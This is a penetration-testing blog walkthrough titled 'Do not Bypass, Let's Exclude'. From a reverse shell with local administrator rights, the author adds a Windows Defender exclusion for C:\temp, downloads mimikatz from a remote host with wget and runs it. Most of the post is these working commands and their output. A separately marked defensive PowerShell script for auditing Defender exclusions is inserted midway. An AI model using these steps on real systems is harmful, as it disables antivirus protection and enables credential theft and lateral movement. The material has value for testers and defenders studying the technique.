Do not Bypass, Let's Exclude - Windows Defender

AV bypass is one of the most challenging stages of a penetration test. Sometimes we do not need any bypass method at all, because the AV is misconfigured or unlicensed and does not catch or detect our payloads, enumeration tools and so on. In general, though, it can be frustrating.

In this write-up I do not present any AV bypass, hiding or encryption method. Sometimes simple methods are more effective.

As you know, some legitimate applications or services are flagged as malicious by endpoint protection software, and vendors advise excluding them from AV scanning. At the end of the day, IT admins add them to the AV scan exclusion list and the applications or services work as expected.

So, as penetration testers, we want to run our payloads correctly, get a reverse shell and run our enumeration tools as expected. It is our right, isn't it?

Step 1 - Enumeration

Here is a reverse shell on a Windows host.

C:\Users\berkan\Desktop>whoami
whoami
desktop-o9a8a9n\berkan

C:\Users\berkan\Desktop>net user berkan
net user berkan
User name berkan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 4/24/2021 8:35:27 PM
Password expires Never
Password changeable 4/24/2021 8:35:27 PM
Password required No
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/31/2021 6:46:10 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.


C:\Users\berkan\Desktop>

What luck: the user is a member of the local Administrators group. Well, let's run mimikatz and get some hashes or clear-text passwords for lateral movement.

C:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Temp> wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
PS C:\Temp> dir
dir


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/31/2021 7:22 PM 1045256 mimikatz.exe


PS C:\Temp> .\mimikatz.exe
.\mimikatz.exe
Program 'mimikatz.exe' failed to run: Operation did not complete successfully because the file contains a virus or
potentially unwanted softwareAt line:1 char:1
+ .\mimikatz.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\mimikatz.exe
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

PS C:\Temp>

Oops. An endpoint protection product is running. In the output of tasklist /SVC, WinDefend, aka Windows Defender, appears to be running.

MsMpEng.exe                   3344 WinDefend                                                    

Step 2 - Adding Exclusion

Well, let's read the Windows documentation for the Windows Defender[1] commands.

First of all, check the existing Windows Defender configuration. The Get-MpPreference cmdlet helps with that.

PS C:\temp> Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List


ExclusionPath :
ExclusionExtension :
ExclusionProcess :

There are no defined exclusions, so we can add one. Note that Add-MpPreference requires an elevated (administrator) session; reading the configuration does not.

PS C:\temp>  Add-MpPreference -ExclusionPath "C:\temp"
Add-MpPreference -ExclusionPath "C:\temp"
PS C:\temp> Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List


ExclusionPath : {C:\temp}
ExclusionExtension :
ExclusionProcess :

Technically, Windows Defender no longer scans the C:\temp directory, so any malicious tool can be run from it. So, I can download and run mimikatz.
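As an added example from the defender's side (not part of the original post), this PowerShell script reads the same Get-MpPreference properties the post queries, flags path exclusions that sit in user-writable locations such as C:\temp, and lists recent exclusion changes from the Defender operational log. It assumes that event ID 5007 messages name the changed Exclusions registry value; the writable-location list is a heuristic.

```powershell
# Added example, not from the original post: audit Defender exclusions on a host.
# Assumes the Defender PowerShell module and the Defender operational event log
# (both present on a default Windows 10/11 install). Run from an elevated shell.

# 1. Read the same three properties the post queries with Get-MpPreference.
$pref       = Get-MpPreference
$paths      = @($pref.ExclusionPath      | Where-Object { $_ })
$extensions = @($pref.ExclusionExtension | Where-Object { $_ })
$processes  = @($pref.ExclusionProcess   | Where-Object { $_ })

# 2. Heuristic: flag path exclusions in locations a local user can normally write
#    to (drive roots, C:\temp, C:\Users\..., C:\ProgramData, C:\Windows\Temp).
#    An exclusion there lets anything dropped into the folder run unscanned,
#    which is exactly what the post relies on.
$risky = foreach ($p in $paths) {
    if ($p -match '^[A-Za-z]:\\(temp|tmp|users|programdata|windows\\temp)?(\\|$)') { $p }
}

# 3. Recent exclusion changes from the Defender operational log. Event ID 5007
#    ("configuration has changed") is logged when Add-MpPreference succeeds; the
#    assumption here is that its message names the Exclusions\Paths, \Extensions
#    or \Processes registry value that changed, which is what the filter matches.
$changes = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions\\(Paths|Extensions|Processes)' } |
    ForEach-Object {
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Change = (($_.Message -split "`r?`n") -match 'New value').Trim() -join ' '
        }
    }

# 4. Report.
"Path exclusions      : $($paths -join ', ')"
"Extension exclusions : $($extensions -join ', ')"
"Process exclusions   : $($processes -join ', ')"
if ($risky)   { "User-writable path exclusions to review: $($risky -join ', ')" }
if ($changes) { "Exclusion changes in the last 7 days:"; $changes | Format-Table -AutoSize }
else          { "No exclusion changes logged in the last 7 days." }
```

Because adding an exclusion is an administrator action, forwarding this log to a central SIEM and alerting on event 5007 entries that touch Exclusions is the simplest way to catch the technique described in this post.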

PS C:\temp> wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
PS C:\temp> dir
dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/31/2021 7:50 PM 1045256 mimikatz.exe



PS C:\temp> .\mimikatz.exe
.\mimikatz.exe

.#####. mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK


Cheers !